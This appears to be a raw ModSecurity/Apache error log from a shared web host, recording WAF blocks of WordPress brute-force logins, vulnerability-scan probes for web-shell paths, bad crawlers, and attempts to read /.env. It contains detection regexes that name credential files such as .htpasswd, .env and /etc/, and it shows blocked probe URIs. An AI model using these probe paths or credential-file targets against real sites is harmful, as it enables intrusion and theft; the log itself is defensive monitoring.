[Tue May 26 14:36:05.138071 2026] [security2:error] [pid 626747:tid 626930] [client 89.124.113.81:45897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVifBVF8Qmdmw_OMfLy2wAAAT8"], referer: https://atreegroup.com/2025/10/05/hello-world/
[Tue May 26 14:36:05.652424 2026] [security2:error] [pid 626747:tid 626986] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVifRVF8Qmdmw_OMfLy4gAAAXc"]
[Tue May 26 14:36:06.175696 2026] [security2:error] [pid 626747:tid 626974] [client 112.209.46.53:48194] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahVifRVF8Qmdmw_OMfLy9gAAAWs"]
[Tue May 26 14:36:06.796988 2026] [security2:error] [pid 626747:tid 626974] [client 112.209.46.53:48194] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahVifRVF8Qmdmw_OMfLy9gAAAWs"]
[Tue May 26 14:36:06.797038 2026] [security2:error] [pid 626747:tid 626974] [client 112.209.46.53:48194] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahVifRVF8Qmdmw_OMfLy9gAAAWs"]
[Tue May 26 14:36:07.607082 2026] [security2:error] [pid 626747:tid 626894] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVifxVF8Qmdmw_OMfLzIwAAARs"]
[Tue May 26 14:36:08.629233 2026] [security2:error] [pid 626747:tid 626939] [client 216.244.66.241:33418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/cossackcffc/bcaacc1329538.shtml"] [unique_id "ahVigBVF8Qmdmw_OMfLzQgAAAUg"]
[Tue May 26 14:36:08.629345 2026] [security2:error] [pid 626747:tid 626939] [client 216.244.66.241:33418] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/cossackcffc/bcaacc1329538.shtml"] [unique_id "ahVigBVF8Qmdmw_OMfLzQgAAAUg"]
[Tue May 26 14:36:09.613539 2026] [security2:error] [pid 626747:tid 626853] [remote 74.7.241.58:51268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVigRVF8Qmdmw_OMfLzWAABUGk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:36:09.900982 2026] [security2:error] [pid 626747:tid 626922] [client 185.191.171.1:14908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVigRVF8Qmdmw_OMfLzZQAAATc"]
[Tue May 26 14:36:09.901215 2026] [security2:error] [pid 626747:tid 626922] [client 185.191.171.1:14908] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVigRVF8Qmdmw_OMfLzZQAAATc"]
[Tue May 26 14:36:10.283166 2026] [security2:error] [pid 626747:tid 626992] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVigRVF8Qmdmw_OMfLzZAAAAX0"]
[Tue May 26 14:36:11.713559 2026] [security2:error] [pid 626747:tid 626984] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVigxVF8Qmdmw_OMfLzhwAAAXU"]
[Tue May 26 14:36:12.672183 2026] [security2:error] [pid 626747:tid 627000] [client 176.65.139.237:51324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.veganfoodindia.moes-art.com"] [uri "/.env"] [unique_id "ahVihBVF8Qmdmw_OMfLzqQAAAYU"]
[Tue May 26 14:36:12.687708 2026] [security2:error] [pid 626747:tid 626884] [client 176.65.139.234:18208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "veganfoodindia.com"] [uri "/.env"] [unique_id "ahVihBVF8Qmdmw_OMfLzqgAAARE"]
[Tue May 26 14:36:13.210901 2026] [security2:error] [pid 626747:tid 626957] [client 216.244.66.241:33424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/intermercurialbfaf/adaabe1676113.shtml"] [unique_id "ahVihRVF8Qmdmw_OMfLztAAAAVo"]
[Tue May 26 14:36:13.211011 2026] [security2:error] [pid 626747:tid 626957] [client 216.244.66.241:33424] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/intermercurialbfaf/adaabe1676113.shtml"] [unique_id "ahVihRVF8Qmdmw_OMfLztAAAAVo"]
[Tue May 26 14:36:13.448213 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVihRVF8Qmdmw_OMfLzuwAAAX0"]
[Tue May 26 14:36:13.448340 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVihRVF8Qmdmw_OMfLzuwAAAX0"]
[Tue May 26 14:36:14.422978 2026] [security2:error] [pid 626747:tid 626918] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVihhVF8Qmdmw_OMfLz1AAAATM"]
[Tue May 26 14:36:15.369025 2026] [autoindex:error] [pid 626747:tid 626984] [client 43.156.44.207:40312] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:36:17.155741 2026] [security2:error] [pid 626747:tid 626885] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViiBVF8Qmdmw_OMfL0IgAAARI"]
[Tue May 26 14:36:17.353582 2026] [security2:error] [pid 626747:tid 626887] [client 4.201.75.230:20167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/ws.php"] [unique_id "ahViiRVF8Qmdmw_OMfL0OQAAARQ"]
[Tue May 26 14:36:18.613184 2026] [security2:error] [pid 626747:tid 626983] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViihVF8Qmdmw_OMfL0VwAAAXQ"]
[Tue May 26 14:36:20.937982 2026] [security2:error] [pid 626747:tid 626921] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVijBVF8Qmdmw_OMfL0jQAAATY"]
[Tue May 26 14:36:21.204396 2026] [security2:error] [pid 626747:tid 626784] [remote 193.42.61.12:48084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVijRVF8Qmdmw_OMfL0nwABIyQ"]
[Tue May 26 14:36:22.159711 2026] [security2:error] [pid 626747:tid 627001] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVijRVF8Qmdmw_OMfL0sAAAAYY"]
[Tue May 26 14:36:23.466033 2026] [security2:error] [pid 626747:tid 626878] [client 90.138.115.152:46140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVijxVF8Qmdmw_OMfL03QABC0A"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 14:36:23.778772 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVijxVF8Qmdmw_OMfL06AAAAX0"]
[Tue May 26 14:36:23.778937 2026] [security2:error] [pid 626747:tid 626992] [client 202.141.83.254:53800] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVijxVF8Qmdmw_OMfL06AAAAX0"]
[Tue May 26 14:36:23.894718 2026] [security2:error] [pid 626747:tid 626833] [remote 45.250.255.226:45992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVijxVF8Qmdmw_OMfL05QABX1U"]
[Tue May 26 14:36:24.053983 2026] [security2:error] [pid 626747:tid 626821] [remote 121.200.216.55:39856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVijxVF8Qmdmw_OMfL07AABREk"]
[Tue May 26 14:36:24.754584 2026] [security2:error] [pid 626747:tid 626983] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVikBVF8Qmdmw_OMfL09QAAAXQ"]
[Tue May 26 14:36:26.975420 2026] [security2:error] [pid 626747:tid 626895] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVikhVF8Qmdmw_OMfL1MAAAARw"]
[Tue May 26 14:36:28.945589 2026] [security2:error] [pid 626747:tid 626942] [client 49.13.167.123:36970] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVilBVF8Qmdmw_OMfL1aAAAAUs"], referer: http://ucdc.co.in/
[Tue May 26 14:36:29.002101 2026] [security2:error] [pid 626747:tid 626829] [remote 95.216.117.13:41044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVilBVF8Qmdmw_OMfL1eQABR1E"]
[Tue May 26 14:36:29.061376 2026] [security2:error] [pid 626747:tid 626948] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVilBVF8Qmdmw_OMfL1cwAAAVE"]
[Tue May 26 14:36:29.207957 2026] [security2:error] [pid 626747:tid 626932] [client 106.193.238.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVilBVF8Qmdmw_OMfL1eAAAAUE"]
[Tue May 26 14:36:31.119503 2026] [security2:error] [pid 626747:tid 626919] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVilhVF8Qmdmw_OMfL1uQAAATQ"]
[Tue May 26 14:36:31.790212 2026] [security2:error] [pid 626747:tid 626963] [client 4.201.75.230:20172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/404.php"] [unique_id "ahVilxVF8Qmdmw_OMfL1zwAAAWA"]
[Tue May 26 14:36:33.099456 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVimBVF8Qmdmw_OMfL16wAAAUg"]
[Tue May 26 14:36:33.709701 2026] [security2:error] [pid 626747:tid 626993] [client 4.201.75.230:20181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahVimRVF8Qmdmw_OMfL2FAAAAX4"]
[Tue May 26 14:36:34.350754 2026] [security2:error] [pid 626747:tid 626828] [remote 18.190.7.192:33532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVimhVF8Qmdmw_OMfL2IQABMFA"]
[Tue May 26 14:36:34.449579 2026] [security2:error] [pid 626747:tid 626986] [client 202.141.83.254:53773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVimhVF8Qmdmw_OMfL2KAAAAXc"]
[Tue May 26 14:36:34.449711 2026] [security2:error] [pid 626747:tid 626986] [client 202.141.83.254:53773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVimhVF8Qmdmw_OMfL2KAAAAXc"]
[Tue May 26 14:36:35.025339 2026] [security2:error] [pid 626747:tid 626938] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVimhVF8Qmdmw_OMfL2MgAAAUc"]
[Tue May 26 14:36:35.277266 2026] [security2:error] [pid 626747:tid 626913] [client 4.201.75.230:20166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-conf.php"] [unique_id "ahVimxVF8Qmdmw_OMfL2SwAAAS4"]
[Tue May 26 14:36:36.638093 2026] [security2:error] [pid 626747:tid 626915] [client 4.201.75.230:20185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-login.php"] [unique_id "ahVinBVF8Qmdmw_OMfL2YgAAATA"]
[Tue May 26 14:36:37.274864 2026] [security2:error] [pid 626747:tid 626994] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVinBVF8Qmdmw_OMfL2ZQAAAX8"]
[Tue May 26 14:36:39.521474 2026] [security2:error] [pid 626747:tid 626994] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVinxVF8Qmdmw_OMfL2qQAAAX8"]
[Tue May 26 14:36:40.111682 2026] [security2:error] [pid 626747:tid 626933] [client 4.201.75.230:20198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/abc.php"] [unique_id "ahVioBVF8Qmdmw_OMfL2vgAAAUI"]
[Tue May 26 14:36:41.174265 2026] [security2:error] [pid 626747:tid 626900] [client 4.201.75.230:20168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/abcd.php"] [unique_id "ahVioRVF8Qmdmw_OMfL20wAAASE"]
[Tue May 26 14:36:41.253230 2026] [security2:error] [pid 626747:tid 627004] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVioBVF8Qmdmw_OMfL2ywAAAYk"]
[Tue May 26 14:36:42.774486 2026] [security2:error] [pid 626747:tid 626754] [remote 3.208.180.187:60894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahViohVF8Qmdmw_OMfL2_QABhwY"]
[Tue May 26 14:36:42.941040 2026] [security2:error] [pid 626747:tid 626883] [client 4.201.75.230:20182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/as.php"] [unique_id "ahViohVF8Qmdmw_OMfL3DgAAARA"]
[Tue May 26 14:36:44.043971 2026] [security2:error] [pid 626747:tid 626920] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVioxVF8Qmdmw_OMfL3JAAAATU"], referer: https://www.anujtradingco.com/
[Tue May 26 14:36:44.217656 2026] [security2:error] [pid 626747:tid 626881] [client 153.75.250.149:49434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cicodev.org"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3JgAAAQ4"]
[Tue May 26 14:36:44.433140 2026] [security2:error] [pid 626747:tid 626931] [client 4.201.75.230:20201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-trackback.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3NQAAAUA"]
[Tue May 26 14:36:44.690874 2026] [security2:error] [pid 626747:tid 626947] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3MwAAAVA"]
[Tue May 26 14:36:44.778968 2026] [security2:error] [pid 626747:tid 627000] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3agAAAYU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1286808&moderation-hash=1c003ac6424c5200fc1b6e47c62a48e9
[Tue May 26 14:36:44.881920 2026] [security2:error] [pid 626747:tid 626912] [client 202.141.83.254:19748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3eAAAAS0"]
